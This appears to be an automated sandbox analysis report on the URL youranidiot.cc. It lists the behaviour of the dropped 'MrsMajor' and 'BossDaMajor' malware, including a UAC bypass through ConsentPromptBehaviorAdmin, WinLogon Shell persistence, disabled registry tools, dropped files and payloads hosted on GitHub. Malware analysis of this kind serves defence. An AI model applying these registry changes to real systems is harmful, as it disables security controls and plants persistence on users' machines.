Analysis Overview
Threat Level: Known bad
The file http://youranidiot.cc was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies WinLogon for persistence
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Disables RegEdit via registry modification
Downloads MZ/PE file
Disables Task Manager via registry modification
Modifies system executable filetype association
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Drops desktop.ini file(s)
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Enumerates connected drives
Drops file in Windows directory
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Access Token Manipulation: Create Process with Token
Enumerates physical storage devices
Browser Information Discovery
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious use of SetWindowsHookEx
NTFS ADS
Delays execution with timeout.exe
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
System policy modification
Modifies Control Panel
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-31 00:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-31 00:45
Reported
2024-08-31 00:53
Platform
win10v2004-20240802-en
Max time kernel
433s
Max time network
435s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\Program Files\\mrsmajor\\Launcher.vbs\"" | C:\Windows\System32\wscript.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\wscript.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\disableregistrytools = "1" | C:\Windows\System32\wscript.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\BossDaMajor.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\robux.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\robux.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\robux.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MrsMajor3.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\eulascr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BossDaMajor.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\eulascr.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\mrsmajor\CPUUsage.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\default.txt | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\Icon_resource\SkullIco.ico | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\Launcher.vbs | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Program Files\mrsmajor\CPUUsage.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\def_resource\creepysound.mp3 | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\def_resource\f11.mp4 | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\Doll_patch.xml | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\def_resource\@Tile@@.jpg | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\def_resource\Skullcur.cur | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\DreS_X.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\MrsMjrGuiLauncher.bat | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\mrsmajorlauncher.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\MrsMjrGui.exe | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\reStart.vbs | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Program Files\mrsmajor\WinLogon.bat | C:\Windows\system32\wscript.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\robux.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\BossDaMajor.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\unregmp2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\robux.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\robux.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Cursors | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Cursors\Arrow = "C:\\Program Files\\mrsmajor\\def_resource\\skullcur.cur" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Cursors\AppStarting = "C:\\Program Files\\mrsmajor\\def_resource\\skullcur.cur" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Cursors\Hand = "C:\\Program Files\\mrsmajor\\def_resource\\skullcur.cur" | C:\Windows\System32\wscript.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "103" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2718105630-359604950-2820636825-1000\{FEA50EEF-5CC0-4FAD-9469-7C69C5B4D342} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2718105630-359604950-2820636825-1000\{79793BAC-5654-4ACB-93FD-7110AB5C49A8} | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mp4file | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico" | C:\Windows\System32\wscript.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 745914.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 925248.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 637841.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 557387.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 872608.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 887496.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system | C:\Windows\System32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\wscript.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youranidiot.cc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcd73946f8,0x7ffcd7394708,0x7ffcd7394718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3380 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
